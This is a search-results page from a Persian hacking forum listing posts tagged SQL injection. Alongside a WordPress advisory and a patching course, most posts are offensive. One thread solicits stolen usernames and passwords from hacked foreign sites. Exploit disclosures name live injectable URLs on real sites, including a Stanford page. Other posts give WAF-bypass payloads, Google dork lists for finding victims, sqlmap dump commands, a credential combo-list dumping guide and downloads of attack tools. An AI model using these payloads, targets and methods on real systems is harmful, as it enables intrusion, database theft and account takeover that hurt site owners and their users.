جستجو در تالار

در حال نمایش نتایج برای برچسب های 'sql injection'.



تنظیمات بیشتر جستجو

  • جستجو بر اساس برچسب

    برچسب ها را با , از یکدیگر جدا نمایید.
  • جستجو بر اساس نویسنده

نوع محتوا


Product Groups

  • بسته های آموزشی
  • ارتقا به کاربر ویژه

تالار ها

  • اخبار و اعلانات انجمن گاردایران
    • قوانین و اطلاعیه های سایت
    • بخش مسابقات انجمن
    • انتقادات و پیشنهادات
    • افتخارات و اطلاعیه های تیم گارد ایران
    • بخش ارتقاء کاربران
    • اخبار هک و امنیت
    • اکسپلویت های ثبت شده توسط تیم امنیتی گارد ایران
    • برنامه ها و ابزارهای نوشته توسط گارد ایران
  • بخش های خصوصی انجمن گاردایران
    • سوال و جواب های عمومی
    • بخش خصوصی
    • آموزش های تصویری نفوذ به سیستم های شخصی و روشهای مقابله
  • انجمن نفوذ و امنیت
    • آموزش های تصویری
    • آموزش های تصویری سایت ها و سرورها و روشهای مقابله
    • آموزشهای تصویری شبکه و روشهای مقابله
    • حملات شبکه و راههای مقابله
    • DOS , DDOS
    • ویروس ها و تروجان ها
    • متاسپلویت Metasploit
    • ابزارهای امنیتی
    • بخش کرک و رمزنگاری
    • Shell Script
    • آسیب پذیری های وایرلس
    • اکسپلویت
    • باگ های امنیتی
    • امنیت ایمیلهای شخصی
    • تارگت های تمرینی
    • اسکنرها و ابزارهای هکینگ
  • برنامه نویسی
    • برنامه نویسی
    • برنامه نویسی تحت وب
  • بخش موبایل
    • بخش مخصوص موبایل
    • هک موبایل
  • شبکه
    • Cisco سیسکو
    • نتورک پلاس Netwok+
    • مایکروسافت Microsoft
    • میکروتیک Mikrotik
    • مجازی سازی
    • ابزارهای شبکه و مانیتورینگ
    • فایروال
  • سیستم عامل
    • لینوکس
    • ویندوز
    • کالی لینوکس Kali Linux
    • مکینتاش
  • الکترونيک و روباتيک
    • الکترونيک
    • ميکروکنترلرها و پروسسور ها
    • نرم افزار هاي تخصصي برق و الکترونيک
    • روباتيک
  • گرافيک
    • فتوشاپ
    • فلش
  • متفرقه
    • بحث آزاد

دسته ها

  • ویدیوهای آموزشی

جستجو در ...

جستجو به صورت ...


تاریخ ایجاد

  • شروع

    پایان


آخرین به روز رسانی

  • شروع

    پایان


فیلتر بر اساس تعداد ...

تاریخ عضویت

  • شروع

    پایان


گروه


AIM


MSN


Website URL


ICQ


Yahoo


Jabber


Skype


محل سکونت


Interests

22 نتیجه پیدا شد

  1. سلام خدمت تمامی کاربران گاردایران امروز براتون یه کتاب آماده کردم که کاملا مفهوم حملات sql injection رو بیان کرده. این کتاب 79 صفحه داره. با خوندن این کتاب در زمان خیلی کمی به حملات sql مسلط میشوید. پیشنهاد من برای یادگیری بهتر آشنایی به sql , database , php هست تا بهتر متوجه و بکار بگیرید. هدف از انتشار این کتاب فقط آشنایی شما بوده و هرگونه سو استفاده روی سایت های ایرانی برخورد جدی دارد. منبع : پارس بوک sql-Injection-hack.pdf
  2. سلام دوستان .. درود من یک سایتی رو اسکن کردم و فهمیدم که باگ sql injection داره .. توی آموزش های انجمن هم درست توضیح ندادن که بفهمیم باید چیکار کنیم و الان من نمیدونم چجوری باید این سایت رو بزنمش.. توی آموزش ها به این شکل گفته شده .. www.example.com/news.php?id=1 .... من هرکاری میکنم نمیدونم این قسمت رو (news.php?id=1) باید از کجا پیداش کنم...اصلا این چی هست؟؟ چجوری باید این id رو پیدا کنم ؟ اون سایتی که من اسکنش کردم با وردپرس ساخته شده ممنون میشم اگر راهنمایی کنید و یا یک سایتی رو به همین روش بزنید و به صورت تصویری پست کنید توی انجمن..
  3. با سلام خدمت کلیه دوستان و اساتید امروز تصمیم گرفتم که دوره آموزش تست نفوذ همراه با زیرنویس فارسی در اختیار همه علاقمندان بذارم تا بتونن با کار های ضروری تست نفوذ آشنا بشن. این دوره توسط آقای مالکوم شور آموزش داده میشه. سرفصل ها: 00- معرفی (3 ویدیو - ~3 دقیقه) 01- تست نفوذ چیست؟ (2 ویدیو - ~16 دقیقه) 02- ابزار تست نفوذ (6 ویدیو - ~28 دقیقه) 03- اسکریپت نویسی بش (3 ویدیو - ~6 دقیقه) 04-اسکریپت نویسی پایتون (7 ویدیو - ~21 دقیقه) 05- کالی و متااسپلویت (7 ویدیو - ~25 دقیقه) 06-تست نفوذ وب (4 ویدیو - ~16 دقیقه) 07-درک کدهای اکسپلویت (4 ویدیو - ~35 دقیقه) 08- جمع بندی (1 ویدیو - ~2 دقیقه) طول دوره : جمعا 2 ساعت و 29 دقیقه درجه بندی سطح: متوسط ( Intermediate ) من هر قسمت رو با فاصله ارسال میکنم. چونکه اول باید زیرنویس رو ترجمه کنم بعد استارتر رو بهش بچسبونم و کلی دردسر دیگه. از فصل دو به بعد هم موارد آموزشی یه خورده تخصصی میشن و نیاز به حفظ کردن و تسلط دارن. پس توی فاصله ی بین هر آموزش هم سعی کنید با تکرار عملی آموزشی ها، اونا رو یاد بگیرید. آموزش ها حاوی فایل ویدیویی بهمراه زیرنویس فارسی هستن تا بتونید روی هر دستگاهی اونا رو مشاهده کنید. بدلیل آموزشی بودن پست به هیچ وجه اقدام به ارسال اسپم جهت تشکر و یا پرسیدن سوال نکنید. اگر ابهام، مشکل و یا سوالی داشتید بصورت خصوصی بپرسید ، تشکر هم که دکمه داره. اسپم ممنوع پسورد کلیه فایل های فشرده هم : guardiran.org امیدوارم لذت ببرید. کیفیت ویدیو ها : HD 720p چنانچه استقبال خوبی بشه، در سطح گسترده انواع آموزش ها رو ارائه خواهیم داد. از همینجا اعلام میکنم که ویدیوی آموزشی بدون واترمارک هست و امکان انتشار و اشتراک ویدیو وجود داره. پس باید بگم که مسئولیت هرگونه سوءاستفاده از دوره های آموزشی فقط و فقط بر عهده کاربر خاطی هست.
  4. اگر وبسایت وردپرس دارید حتما به نسخه 4.8.3 بروزرسانیش کنید. Severity Medium Patch available YES Number of vulnerabilities 1 CVSSv2 5 (AV:N/AC:M/Au:N/C:P/I:P/A:P/E:U/RL:OF/RC:C) CVSSv3 6.3 [CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L/E:U/RL:O/RC:C] CVE ID N/A CWE ID CWE-89 Exploitation vector Network Public exploit Not available Vulnerable software WordPress Vulnerable software versions WordPress 4.8.2 WordPress 4.8.1 WordPress 4.8 Show more Vendor URL WordPress.ORG Advisory type Public Security Advisory 1) SQL injection Description The vulnerability allows a remote attacker to execute arbitrary SQL commands in application's database. The vulnerability exists due to an error in $wpdb->prepare() that can lead to SQL injection attacks exploited via third-party software. Successful exploitation of the vulnerability may allow an attacker to execute arbitrary SQL commands in web application database. Remediation Update to version 4.8.3. External links https://wordpress.org/news/2017/10/wordpress-4-8-3-security-release/
  5. mownten

    پیش نیازهای اجرا: .net framework 3.5 + 4.6 Visual C++ 2017 x64/x86 رمز : guardiran.org SQLi Dumper 9.2.1.part4.rar SQLi Dumper 9.2.1.part1.rar SQLi Dumper 9.2.1.part2.rar SQLi Dumper 9.2.1.part3.rar SQLi Dumper 9.2.1.part5.rar
  6. به نام خدا عرض سلام و ادب طبق هماهنگی که با REX عزیز صورت گرفته قرار بر این شد تاپیک دیتابیس سایت های مورد نفوذ قرار گرفته خارجی با باگ SQL Injection و یا فایل Config که توسط شل و یا روش های دیگر بازیابی شده است رو ایجاد کنیم . تنها Username و Password و اگر مایل بودید Email هم گذاشته شود. قوانین هم که مشخص : اسپم ممنوع ! دیتابیس اگر SQLi بود حتما لینک دستی قراربدید اگر از شل و فایل کانفیگ بود فقط سطر و ستون های جدول یوزر و ادمین رو قرار بدید. لینک لاگین در صورت پیدا شدن گذاشته شود. دیتابیسی که قرار میدهید یکی از یوزرهاش به سایت لاگین کند. فقط دیتابیس سایت های خارجی مورد قبول است.
  7. سلام با این آموزش برای SQL Injection دیگه نیازی به خیلی از ابزار ها و اسکریپت ها نخواهید داشت هر دو ابزار NMap و SQLmap روی کالی لینوکس نصبه. در این آموزش برای تست ابزار ها از لینک های زیر استفاده میکنیم که میتونین برای تمرین استفاده کنین: www.vulnweb.com testphp.vulnweb.com *** در وارد کردن هدف //:https رو پاک کنید و فقط .www بمونه!!! *** 1. با استفاده از کامند زیر وب سایت هدف رو برای پیدا کردن باگ SQL مثله warning page اسکن کنید: nmap -sV -script=http-sql-injection address website -p 80 *سویچ sV- میگه که پورت باز رو برای یافتن سرویس و نسخه ی اون پروب کن. *سویچ script- میگه از اسکریپت های ابزار nmap برای سکن هدف استفاده کن.(مثله : اسکنر باگ SQL) *سویچ p- هم میگه شماره پورت رو وارد کن که اینجا 80.(چون پورتیه که در وبسرور، سرور بهش گوش میده). *به جای address website ادرس هدف رو وارد کنید که اینجا برای تست: testphp.php.vulnweb.com بعد از یک مدت مکس برای اسپایدر کردن هدف که مدتش بستگی به حجم و صفحات وبسایت داره لیست صفحات دارای باگ رو خواهید دید. برای مثال : 2.از کامندهای زیر هم به ترتیب برای دست رسی به دیتا بیس و استخراج(مشاهده کالم و تیبل ها و../) اطلاعات استفاده کنید: sqlmap -u address yafte shode --dbs sqlmap -u address yafte shode -D esme data base --dump all *سویچ u- برای وارد کردن ادرس هدف. *سویچ dbs-- برای مشاهده ی دیتابیس های موجود در هدف. *سویچ D- برای وارد کردن اسم دیتابیس مورد نظر که اینجا . (عکس های خودم رو بعدا وارد میکنم فعلا همین باشه.) سوالی بود بپرسید d0kt0r .
  8. Phoen1X

    به نام خدا در این تاپیک قصد دارم تا آموزش آسیب پذیری های PHP و نحوه پچ کردن اون هارو آموزش بدم پیش نیاز این تاپیک اسکریپتی هست که من برای تیم نوشتم(اینجا) و آشنایی ابتدایی با زبان php در این تاپیک سعی میکنم که آسیب پذیری هارو به صورت کامل یعنی اول برسی میکنیم که چطور این آسیب پذیری به وجود میاد بعد این که یک نفوذگر چطور با استفاده از این آسیب پذیری به وب سایت شما نفوذ می کنه و بعد هم نحوه پچ کردن اون آسیب پذیری. سر فصل آموزش ها : - SQL Injection - Blind SQL Injection - Authentication Bypass - File Upload - Stored Cross Site Scripting - Reflected Cross Site Scripting - Dom Cross Site Scripting - Cross Site Request Forgery - Remote File Inclusion - Local File Disclosure/Download - Remote Code Execution - Remote Command Execution تاپیک به مرور زمان آپدیت خواهد شد پس لطفا با اسپم های بی جا خرابش نکنین سوالی داشتید میتونید در پ.خ و یا در بخش مربوطه بپرسید
  9. # Title: Technology Stanford sql Injection # date: 4/28/2017 # Exploit Author : Guardiran Security Team # Google Dork : - # Softwar Link : - # Vendor Homepage: http://techfinder.stanford.edu # Tested On : Kali Linux w3af / Windows 8.1 hello guyd. technology stanford university have sqli bug. we can inject and do something -- response Error -- Warning: PDOStatement::execute(): SQLSTATE[08004]: Server rejected the connection: 1301 Server rejected the connection: Failed to parse statement. (SQLExecute[1301] at ext\pdo_odbc\odbc_stmt.c:254) in C:\inetpub\wwwroot\technology_detail.php on line 483 Poc: Page vulnerable : [technology_detail.php] Inject : http://techfinder.stanford.edu/technology_detail.php?ID=74%27 * Special Tnx : cod3!nj3ct!0n , REX , alizombie , abarestan , DeMoN , reza attacker , No_one , 1TED , J.ALL_Editor , S9pY , Proxy And All Member of Guardiran Security Team * Discovered By : DeMoN * We Are Guardiran Security Team http://iedb.ir/exploits-7471.html
  10. سلام دوستان امروز میخوایم با متد های جالب و بایپس ارور ها در sql injection کار کنیم اول اینکه ما فرض رو بر این میگیرم که شما sqli رو کامل بلدید و فقط نمیتونید بعضی جاهایی که ادمین سایت برای امنیت یه سد هایی رو سر راه ما گزاشته رو بایپس کنیم میریم سراغ آموزش بعد از اینکه ' رو گزاشتیم و صفحه مثل بار اول لود نشد(حالا هرطور دیگه ای.ارور sql .ریدایرکت شدن و...) اولین جایی که ممکنه تو sqli گیر بیفتیم زمانیه که میخوایم ستون هارو پیدا کنیم مثلا target.xxx/index.php?view=blog-detail&newsId=8 تارگت ماست حالا ما میخوایم ستون هاشو بدست بیاریم به این صورت http://target.xxx/index.php?view=blog-detail&newsId=8+order+by+9999-- شاید هر عددی هم که بزاریم باز سایت لود بشه پس بایپس میکینم خب برای اینکه این مشکل رو حل کنیم جلوی value یا همون عدد پشت =یه کوتیشن میذاریم و جلوی اون -- یه+ قرار میدیم و میبینیم مشکل به سادگی حل شد حالا ستون هارو بدست اوردیم http://target.xxx/index.php?view=blog-detail&newsId=8'+order+by+9999--+ به این صورت حالا ستون هاشو بدست اوردیم به طور مثال 8 تا بود حالا بعضی وقتا میبینیم که این کارو کردیم اما دیگه حتی با 1 هم لود نمیشه و ارور میده اینجاس کهه باید بجای order از کلمه group استفاده کنیم که دیگه مطمعنن این سری مشکل رفع میشه اما بعضی وقتا مشکل اساسیه و ارور forbidden میده و اصلا چیزی لود نمیکنه اینجاس که دوباره بایپس لازم میشیم اولین کاری که میکنیم اینه که بجای+--newsId=8'+order+by+9999 http://target.xxx/index.php?view=blog-detail&newsId=8+/*!50000order*/+by+9999-- رو تست میکنیم اگه باز هم نشد برای by هم این رو اضافه میکنیم احتمال زیاد حل میشه اگر باز هم نشد بجای -- عبارت %23 قرار میدیم اگر نشد حروف by / order رو بزرگ میکنیم اگه عمل نکرد میرسیم به اخرین راه قبل از کلمه order /**x**/ x میتونه هر حرفی باشه اضافه می کنیم اگر باز هم ارور داد از جلوی order پاک میکنیم و جلوی by میاریمشکه این سری به احتمال 99 درصد جواب میده خب فکر کنم زیاد طولانی شد ادامه جلسه برای هفته بعد تا خسته نشید تشکر یادتون نره
  11. با سلام ودرود به تمامی عزیزان این تاپیک رو زدم وگفتم همه اون اوموزشهایی که توی برچسب این پست هس رو بذارم اما از تمامی دوستان خواهشمندم در این تاپیک هیچ چیزی ننتویسن بنده ممنون میشم از همه شما تا اسپم نشه من توی یکی از موئسسه های ازاد تدریس میکنم این پستم برا این گذاشتم که توی یکی از کلاسها دیدم یکی از دانشجو ها چون امنیت دوس دارن رفتن پول قرض گرفتن تا این دوررو تموم کنن فلذا دیدم کسایی که از نظر مالی نمیتونن دوره های بسیاری رو ببینن ایجاد کردم همه آموزشها تصویری بوده و همه فایلها هم ضمیمه ودر بعضی موارد هم شاید پی دی اف هم گذاشتم هر اموزش با عنوانی اغاز میشه م تا تموم نشده بعدی شروع نمیشه راستی باز یادم رفته بود ویرایش کردم بعضی اموزشها اگر به صلاح تیم نبود پاک میشه اما در هر حال من میذارم چون نیازه که دوستان حداقل تا پاک کردن ببینن
  12. irblack

    #مقاله کمبو لیست و تشریح آن سلام بعضی دوستان می پرسند combo چیه یا چه استفاده ای داره یا نه خیلیا استفاده میکنن نمیدونن جریانش چیه یمش یوزر پسورد یا ایمیل پسورد که بعضی وقتا نصف بیشترش تو کرک درست در میاد? عجیبه ؟نه؟ اما الان به این پی میبریم که نه عجیب نیست یه مثال میزنم آیا ما میتونیم دیتابیس سایت هایی مثل instagram یا مثلا )Google(gmai رو دربیاریم ؟ مسلما نه ولی میتونیم که از ضعف سایتای کوچیکتر استفاده کنیم حالا میگید چه ربطی داره؟ اینجا میرسیم سر اصل مطلب همه میدونیم که اکثر آدما تو اکثر جاهایی که ثبت نام میکنن یه یوزرنیم و پسورد رو همیشه استفاده میکنن محض فراموش نکردن که این کار اشتباهیه چرا که این روزا مخصوصا در ایران کرک بسیار در حال توسعه هست خب بگذریم حالا چی میشه مثلا حدس میزنن ما چه سایتی ثبت نام کردیم که مثلا میگن این کمبو برایpsn ا؟؟؟ این رو مدیون دورک ها هستیم مثلا inurl="uply.phpid?" تو آش کشک معلومه دورک گیمینگه با سرچ کردن دورک مناسب برای هرکاری بهترین سایتای باگ دار در اون زمینه رو پیدا میکنیم @crackingcity """هیچ سایتی بدون باگ نیست /فقط بعضی باگا شایع، کشف شده و قابل استفاده ان مانند sql injection/Lfi/Rfi و بعضی ها کمتر شناخته شده و کم کاربرد(low) هستن البته فعلا باگ Sql برای دامپ کمبو استفاده میشه ـچون مستقیم به دیتابیس مربوط میشه خودتون در جریانید،؛مطلبو به بیراهه نمیکشم به مطلب اصلی می پردازیم/، حالا دورک رو استفاده کردیم و کمبو رو داریم فقط میمونه تستشون مثلا دورکای گیمینگو برا psn/ps4/uplay،،، استفاده میکنن الان به یه برنامه کرکر نیاز داریم تا تستشون کنیم که تومقاله بعدی به این موضوع می پردازیم امیدوارم مفید واقع شده باشه #irblack اگه استقبال شه آموزش کامل دامپ کمبو رو همینجا میزارم
  13. با سلام. یکی از باگ ها (ضعف امنیتی) شناختخ شده در میان هکر ها sql injection میباشد .متاسفانه این باگ در بیشتر سایت های اسیب پذیر یافت میشه و میتوان به جرات گفت که یکی از خطرناک ترین باگ های شناخته شده هست!!!!شما میتونید با استفاده از ابزار sqlmap در سیستم عامل کالی لینوکس سایت خودتون رو محک بزنید که ایا این اسیب پذیری در سایت شما هم وجود داره یا خیر.... خوب چون تاپیکی که در این رابطه زده شده بود ادامه پیدا نکرد یک آموزش جامع براتون آماده کردم. امیدوارم از این آموزش نهایت بهره رو برده باشید یا علی pass:guardiran.org sqlmap-hacking.part1.rar sqlmap-hacking.part2.rar
  14. باگ FBDj Stats cms Sql Injection Vulnerability ثبت شده توسط تیم امنیتی گارد ایران ########################### # FBDj Stats cms Sql Injection Vulnerability ########################### ########################### # FBDj Stats cms SQL Injection Vulnerability ########################### # Exploit Title: FBDj Stats cms SQL Injection Vulnerability # Date: 16/08/2016 # Exploit Author: Guardiran Security Team # Google Dork: inurl:\"playerdetails.php?id=\" # Version: All Version # Tested on: windows 10,kali linux,windows 8.1 HEllo Guys. This Is a Sql Injection Vulnerability You Can Inject The Sites Without Sql Injection Bug â��------------------------------â�� SQL INJECTION : This CMS And Also Have sqli Vulnerability. We Can inject the Bug As follows ... Bug in : [$site]/[Patch]/playerdetails.php?id=[sql] Demos : http://ts3.virtualpilots.fi/playerdetails.php?id=558 http://stats.acesovereurope.org/playerdetails.php?id=1659 http://www.dutcharcade.com/Sturmovik/playerdetails.php?id=2192 www.battle-fields.com/BF1stats/playerdetails.php?id=1 * Special Tnx : cod3!nj3ct!0n , REX , alizombie , dastmale-sorkh ,Comrade,Abarestan, Reza.attcker , 1TED , J_All_Editor * Discovered By : 1TED * We Are Guardiran Security Team * Guardiran.org ########################### ########################### # Iranian Exploit DataBase = http://IeDb.Ir [2016-08-18] ###########################
  15. سلام و درود خدمت تمامی عزیزان گارد ایران بر طبق هماهنگی های به عمل امده تصمیم بر این شد که این تاپیک رو در انجمن بزنم همونطور که میدونید sql injection یک باگ بسیار بسیار گسترده است و هرچه در بارش بگیم کم گفتیم که برای خودش به چند بخش تقسیم میشه و هر یک از بخش ها به بخش های دیگر و.... قبلا هم یک تاپیک اماده کرده بودم به نام sql injection using creative pro یا همون خلاقیت در sql injection موضوع اون تاپیک با این یکی کاملا فرق میکنه اون در باره روش های خلاقانه بایپس در sqli بود ولی این در باره تمامی روش های حرفه ای بایپس هست چون این احتمال رو میدم تا الان همه بایپس های معمول sql injection رو بلدن من تصمیم گرفتم برای جذابیت بیشتر تاپیک یک حالت مسابقه ای بزارم به این صورت که کاربران بر طبق قوانین انجمن و مسابقه درش شرکت کنند و همچنین جواب هارو با عنوان [answer] برای من بفرستند خوب و اما جایزه پکیج کامل از بهترین های crypter و decrypter که تابحال منتشر شده تحت ویندوز و به این صورت هست که من قبل از هر اموزش تارگت رو میدم بعد از یک الی دوروز جواب رو میدم چون فعلا 4 تا اموزش هست پس پک رو به 4 قسمت تقسیم کردم هربار به برنده قسمت داده میشه پیشنهاد میکنم قبل از مطالعه تاپیک از اموزش های انجمن در رابطه با sql injection استفاده کنید خوب تارگت اول رو قرار میدم تارگت base_64 هست فقط با روش union based بزنید چون نکتش تو null هست تو ارور بیس راحت میشه زد ما اینجا فقط union میخوایم پیروز باشید ....
  16. سلام خدمت اعضای محترم گارد ایران من سایتی رو داشتم بایپس میکردم بعد از Union Select با ارور Data Base Query Failed The Used Select Statements Have A Diffrent Number Of Columns مواجه شدم اگر کسی از شیوه بایپسش مطلع هست ممنون میشم کمک کنه
  17. kingdeface

    دورک باگ Sql Injection inurl:index.php?id= inurl:trainers.php?id= inurl:buy.php?category= inurl:article.php?ID= inurllay_old.php?id= inurl:declaration_more.php?decl_id= inurlageid= inurl:games.php?id= inurlage.php?file= inurl:newsDetail.php?id= inurl:gallery.php?id=d= inurl:event.php?id= inurlroduct-item.php?id= inurl:sql.php?id= inurl:news_view.php?id= inurl:select_biblio.php?id= inurl:humor.php?id= inurl:aboutbook.php?id= inurl:fiche_spectacle.php?id= inurl:article.php?id= inurl:show.php?id= inurl:staff_id= inurl:newsitem.php?num= inurl:readnews.php?id= inurl:top10.php?cat= inurl:historialeer.php?num= inurl:reagir.php?num= inurltray-Questions-View.php?num= inurl:forum_bds.php?num= inurl:game.php?id= inurl:view_product.php?id= inurl:newsone.php?id= inurl:sw_comment.php?id= inurl:news.php?id= inurl:avd_start.php?av inurl:communique_detail.php?id= inurl:sem.php3?id= inurl:kategorie.php4?id= inurl:news.php?id= inurl:index.php?id= inurl:faq2.php?id= inurl:show_an.php?id= inurlreview.php?id= inurl:loadpsb.php?id= inurlpinions.php?id= inurl:spr.php?id= inurlages.php?id= inurl:announce.php?id= inurl:clanek.php4?id= inurlarticipant.php?id= inurl:download.php?id= inurl:main.php?id= inurl:review.php?id= inurl:chappies.php?id= inurl:read.php?id= inurlrod_detail.php?id= inurl:viewphoto.php?id= inurl:article.php?id= inurlerson.php?id= inurlroductinfo.php?id= inurl:showimg.php?id= inurl:view.php?id= inurl:website.php?id= inurl:hosting_info.php?id= inurl:gallery.php?id= inurl:rub.php?idr= inurl:view_faq.php?id= inurl:artikelinfo.php?id= inurl:detail.php?ID= inurl:index.php?= inurlrofile_view.php?id= inurl:category.php?id= inurlublications.php?id= inurl:fellows.php?id= inurl:downloads_info.php?id= inurlrod_info.php?id= inurl:shop.php?do=part&id= inurlroductinfo.php?id= inurl:collectionitem.php?id= inurl:band_info.php?id= inurlroduct.php?id= inurl:releases.php?id= inurl:ray.php?id= inurlroduit.php?id= inurlop.php?id= inurl:shopping.php?id= inurlroductdetail.php?id= inurlost.php?id= inurl:viewshowdetail.php?id= inurl:clubpage.php?id= inurl:memberInfo.php?id= inurl:section.php?id= inurl:theme.php?id= inurlage.php?id= inurl:shredder-categories.php?id= inurl:tradeCategory.php?id= inurlroduct_ranges_view.php?ID= inurl:shop_category.php?id= inurl:tran******.php?id= inurl:channel_id= inurl:item_id= inurl:newsid= inurl:trainers.php?id= inurl:news-full.php?id= inurl:news_display.php?getid= inurl:index2.php?option= inurl:readnews.php?id= inurl:top10.php?cat= inurl:newsone.php?id= inurl:event.php?id= inurlroduct-item.php?id= inurl:sql.php?id= inurl:aboutbook.php?id= inurl:review.php?id= inurl:loadpsb.php?id= inurl:ages.php?id= inurl:material.php?id= inurl:clanek.php4?id= inurl:announce.php?id= inurl:chappies.php?id= inurl:read.php?id= inurl:viewapp.php?id= inurl:viewphoto.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:review.php?id= inurl:iniziativa.php?in= inurl:curriculum.php?id= inurl:labels.php?id= inurl:story.php?id= inurl:look.php?ID= inurl:newsone.php?id= inurl:aboutbook.php?id= inurl:material.php?id= inurlpinions.php?id= inurl:announce.php?id= inurl:rub.php?idr= inurl:galeri_info.php?l= inurl:tekst.php?idt=
  18. DangerBoY

    به نام برنامه نویس هستی سلامی دوباره به اعضای انجمن گارد ایران . امروز معروف ترین باگ بین هکرها رو برای شما آوردم این باگ برای استخراج اطلاعات سایت از جمله یوزر و پسورد سایت هست . البته این باگ رو من توی دو بخش متوسط و حرفه ای براتون میزارم چون بعضی ها روش دستیش شاید براشون سخت باشه . =============================================================================================================== Bug name : SQL وضعیت : پچ نشده تعداد سایت های دارای این باگ در گوگل : بی شمار دورک ها : بی شمار ( دورک های زیادی برای سایت های عربی و.... وجود داره ) =============================================================================================================== آموزش هکرها : ابتدا دورک زیر رو توی گوگل سرچ کنید . سپس یکی از سایتها رو باز کنید و این علامت رو جلوش بزارید ' این علامت برای اینه که بفهمیم سایت باگ sql داره یا نه دورک : inurl : index.php?id=1 ( برای پیدا کردن سایت های بیشتر این باگ اون 1 رو به عدد های دیگه تبدیل کنید ) خب وقتی علامت رو اضافه کردید اگر سایت دوباره بدون هیچ مشکلی لود شد یعنی سایت باگ نداره اما اگر با چنین اروری مواجه شدید یعنی سایت باگ داره : err fetch static page>You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near ''1'' LIMIT 1' at line 1 خب تا الان فهمیدیم سایت باگ داره حالا نحوه هکش رو به صورت یه فیلم ازسیستم خودم واستون آماده کردم : لینک فیلم آموزشی : http://s6.picofile.com/file/8239638042/SQL.rar.html فیلم واضح و گویاس . در آخر تشکر یادتون نره . لینک دانلود نرم افزاری که در فیلم استفاده شده اسمش نرم افزار hAVIJ هستش: http://up.hgdownloadcenter.ir/up/hgdownloadcenter/app/Havij/Havij%201.15%20Pro_hgdc.tk_.rar قسمت بعدی این باگ روش هک به صورت دستی باگ SQL
  19. به نام خدا سلام خدمت دوستان عزیز گارد ایران. در این تاپیک قصد تشریح باگ J.Bird SQL Injection رو دارم ما از این متد در اینجکت دیتابیس استفاده میکنیم. ============================================================= خوب دوستان از همین جا تاپیک رو شروع میکنم. خوب برای اینکه بدون تست تشخیص بدید که نیاز هست از این متد در دیتابیس هکینگ استفاده کنیم یا نه باید ارور هارو مورد بررسی قرار بدید. ارور های این دیتا بیس مانند Fire هست. برخی از این ارورها عبارت اند از: warning: + php یه تابع (function): ibase_query() ibase_fetch_row() ibase_fetch_object() ibase_fetch_assoc() ibase_free_result() برای مثال تارگت زیر: http://seafarer.od.ua/?page=study&course=2%27 اروری که مشاهده میکنیم: Warning: ibase_query(): Dynamic SQL Error SQL error code خوب دوستان این مقدمه ای بر این متد بود. این متد رو در پست های بعدی عملی خواهیم داشت. یا حق
  20. DeMoN

    سلام خدمت دوستان عزیز گارد ایران. براتون کتابی آماده کردم در حوضه باگ امنیتی SQL Injection که در این کتاب شما با تمامی مفاهیم،دستورات و نکات باگ SQL آشنا خواهید شد. پیشنهاد میکنم که حتما اینکتاب رو دانلود و مطالعه کنند خصوصا عزیزان تازه وارد. Pass:guardiran.org یاحق SQLInjection.rar
  21. جواد

    با سلام دوستانی که در مورد زمینه های زیر اطلاعات دارند لطفا راهنمایی کنند. با تشکر DOS Attach (Hping3) in Kali Sniffing Attack (ARP Table & DNS Attack ) in Kali Wireless Password Crack with Air Crack in Kali ICMP Sendig with Nmap in Kali Information Gathering with Nmap in Kali SQL Injection in Kali OpenVas Configuration in Kali
  22. M-R3dH4t

    ســلام این یک نرم افزار خوب و مفید برای سرچ دورک های SQL , LFI , RFI , ASP , PHP که یک جورایی اسکنر هم هســـت از طریق این برنامه هم میتونید تارگت رو شناسایی کنین که باگ SQL داره و اون رو Inject کنین کلا برنامه خوبیه از دســت ندین پسورد فایل : guardiran.org SQL Poizon.rar